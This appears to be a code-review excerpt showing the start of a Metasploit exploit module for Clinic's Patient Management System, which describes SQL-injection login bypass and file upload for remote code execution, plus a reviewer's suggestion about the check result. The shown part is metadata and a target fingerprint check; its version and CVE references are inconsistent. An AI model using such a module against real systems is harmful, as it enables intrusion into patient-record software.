modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb

```diff
@@ -0,0 +1,185 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Clinic\'s Patient Management System 1.0 - Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an SQL injection in login portal, which allows to log in as admin. Next, it allows the attacker to upload malicious files through user modification to achieve RCE.
+        },
+        'Author' => [
+          'msutovsky-r7' # CVE-2025-3096, module developer
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Privileged' => false,
+        'Targets' => [
+          ['Clinic Patient Management System 2.0', {}]
+        ],
+        'DefaultTarget' => 0,
+        'References' => [
+          ['CVE', '2022-2297'],
+          ['CVE', '2025-3096'],
+          ['URL', 'https://www.cve.org/CVERecord?id=CVE-2022-40471'],
+        ],
+        'DisclosureDate' => '2021-10-21',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
+      OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', false])
+    ])
+  end
+
+  def check
+    print_status('Checking if target is vulnerable...')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path + '/'),
+      'method' => 'GET'
+    })
+
+    return Exploit::CheckCode::Unknown('Unexpected response code from server') unless res&.code == 200
+    return Exploit::CheckCode::Unknown('Unexpected content of body') if res.body&.blank?
+    return Exploit::CheckCode::Safe('Clinic PMS not detected') unless res.body.include?("Clinic's Patient Management System in PHP")
+
+    return Exploit::CheckCode::Vulnerable('Clinic PMS detected')
```

Comment:
I believe it would be detected as `Vulnerable` only after a version check:
```suggestion
    return Exploit::CheckCode::Appears('Clinic PMS detected')
```